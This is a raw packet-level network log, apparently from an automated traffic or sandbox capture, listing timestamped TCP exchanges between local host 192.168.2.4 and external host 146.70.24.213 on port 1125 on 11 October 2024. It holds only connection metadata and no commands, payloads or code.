                                                                                                                Oct 11, 2024 16:53:47.782099962 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.782109022 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.782114983 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.782152891 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.785514116 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.785604000 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.785614014 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.785624981 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.785634041 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.785641909 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.785644054 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.785656929 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.785664082 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.785667896 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.785686016 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.785701036 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.785732031 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.785742998 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.785752058 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.785761118 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.785769939 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.785778999 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.785797119 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.785821915 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.785821915 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.785832882 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.785844088 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.785852909 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.785862923 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.785880089 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.785904884 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.785990000 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.786036968 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.786046982 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.786072969 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.786076069 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.786086082 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.786118031 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.786149025 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.786159039 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.786169052 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.786178112 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.786187887 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.786189079 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.786205053 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.786225080 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.786235094 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.786237001 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.786243916 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.786253929 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.786263943 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.786267996 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.786273956 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.786284924 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.786295891 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.786302090 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.786319017 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.786331892 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.786375999 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.786386013 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.786396027 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.786403894 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.786412954 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.786418915 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.786422014 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.786432981 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.786442041 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.786443949 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.786459923 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.786478043 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.786533117 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.786542892 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.786551952 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.786566019 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.786575079 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.786575079 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.786586046 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.786595106 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.786596060 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.786611080 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.786621094 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.786628008 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.786629915 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.786640882 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.786648989 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.786653996 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.786674023 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.786684036 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.786736012 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.786746025 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.786753893 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.786762953 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.786777020 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.786782026 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.786792994 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.786799908 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.786802053 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.786814928 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.786823988 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.786830902 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.786834002 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.786853075 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.786875010 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.786895037 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.786905050 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.786912918 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.786921024 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.786932945 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.786935091 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.786956072 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.786956072 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.786966085 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.786977053 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.786986113 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.786998034 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.787005901 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.787020922 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.787046909 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.787048101 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.787084103 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.787090063 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.787118912 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.787153959 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.787162066 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.787172079 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.787200928 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.787213087 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.787224054 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.787233114 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.787240982 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.787256956 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.787283897 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.787291050 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.787336111 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.787345886 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.787354946 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.787398100 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.787398100 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.787476063 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.787539005 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.787575960 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.787616968 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.787626982 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.787673950 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.875122070 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.875138998 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.875205994 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.875216961 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.875221968 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.875230074 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.875241041 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.875252008 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.875274897 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.875313997 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.875324011 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.875324965 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.875336885 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.875348091 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.875355005 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.875359058 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.875370979 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.875399113 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.875489950 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.875502110 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.875513077 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.875523090 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.875533104 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.875543118 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.875554085 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.875564098 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.875574112 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.875580072 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.875583887 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.875595093 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.875606060 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.875643969 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.875663042 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.875843048 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.875854015 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.875895023 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.876132011 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.876142025 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.876152992 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.876188993 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.876209021 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.876270056 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.876281023 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.876291037 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.876301050 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.876307011 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.876318932 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.876343012 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.876351118 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.876355886 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.876365900 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.876377106 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.876388073 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.876399040 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.876400948 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.876441956 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.876698017 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.876713037 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.876729965 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.876739979 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.876750946 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.876759052 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.876763105 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.876774073 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.876780033 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.876789093 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.876800060 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.876808882 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.876811028 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.876817942 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.876830101 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.876836061 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.876847982 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.876859903 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.876864910 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.876876116 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.876885891 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.876888037 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.876898050 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.876915932 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.876935005 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.876944065 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.876945972 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.876959085 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.876970053 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.876981974 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.876986027 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.876992941 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.877003908 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.877013922 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.877022028 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.877029896 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.877041101 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.877043962 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.877053022 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.877063990 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.877068996 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.877074957 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.877084970 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.877095938 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.877104998 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.877105951 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.877119064 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.877127886 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.877140045 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.877142906 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.877151966 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.877161980 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.877162933 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.877180099 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.877182007 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.877192020 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.877211094 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.877226114 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.877238035 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.877250910 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.877254963 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.877269030 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.877286911 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.877312899 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.877357006 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.877367973 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.877373934 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.877383947 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.877394915 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.877419949 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.877438068 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.877449036 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.877492905 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.877532005 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.877545118 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.877587080 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.877598047 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.877609968 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.877612114 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.877619982 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.877629995 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.877638102 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.877643108 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.877654076 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.877661943 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.877665997 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.877679110 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.877690077 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.877696991 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.877720118 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.877729893 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.877813101 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.877844095 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.877892017 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.877918005 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.877968073 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.877979994 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.878010988 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.878031969 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.878042936 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.878055096 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.878074884 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.878079891 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.878087997 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.878098965 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.878109932 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.878153086 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.878180981 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.878199100 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.878212929 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.878223896 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.878230095 CEST497301125192.168.2.4146.70.24.213
